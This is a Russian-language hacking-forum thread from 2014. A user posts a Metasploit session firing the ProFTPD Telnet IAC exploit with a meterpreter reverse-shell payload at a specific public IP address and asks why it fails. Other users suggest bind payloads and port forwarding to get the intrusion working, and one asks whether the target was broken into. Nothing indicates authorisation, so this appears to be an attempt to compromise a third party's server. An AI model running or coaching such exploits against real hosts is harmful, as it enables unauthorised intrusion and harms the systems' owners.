Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Metasploit (https://forum.antichat.xyz/showthread.php?t=408383)

nike001 14.03.2014 01:50

Что не так?

Код:

Code:
msf > use linux/ftp/proftp_telnet_iac
msf  exploit(proftp_telnet_iac) > set RHOST 213.239.235.179
RHOST => 213.239.235.179
msf  exploit(proftp_telnet_iac) > set RPORT 21
RPORT => 21
msf  exploit(proftp_telnet_iac) > set TARGET 0
TARGET => 0
msf  exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf  exploit(proftp_telnet_iac) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf  exploit(proftp_telnet_iac) > exploit[*] Started reverse handler on 192.168.1.4:4444[*] Automatically detecting the target... [*] FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179][*] Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
msf  exploit(proftp_telnet_iac) >

И всё((

Unknown 14.03.2014 02:39

Вам точно нужен reverse-tcp? По возможности используется что-то более прямое.

По вероятности:

1) Целевая версия таки не уязвима

2) Цель уязвима, но не может законнектиться к вам.

nike001 14.03.2014 09:26

Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?

Спасибо.

Unknown 14.03.2014 15:24

Цитата:

Сообщение от nike001
nike001 said:
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?
Спасибо.

Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.

Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.

nike001 14.03.2014 15:59

Цитата:

Сообщение от madhatter
madhatter said:
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.
Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.

Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.

Unknown 14.03.2014 16:07

Цитата:

Сообщение от nike001
nike001 said:
Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.

Np. Так вы расскажите, поломалась цель?

nike001 14.03.2014 16:23

Цитата:

Сообщение от madhatter
madhatter said:
Np. Так вы расскажите, поломалась цель?

Сейчас буду пробовать. Позже отпишусь.

nike001 14.03.2014 16:39

И shell_bind_tcp, и bind_tcp тоже не работают.

P.S. Если есть у кого киньте ссылку про payloads(виды, и для чего каждый служит)

infoseller 15.03.2014 14:17

А хэндлер-то запущен? и должен быть проброс в локалку...

VY_CMa 15.03.2014 14:26

За все время ни одного хоста с рабочей багой не попадалось, остается собирать на локалке и проверять. 2ТС, скорее всего патченная.


Время: 11:56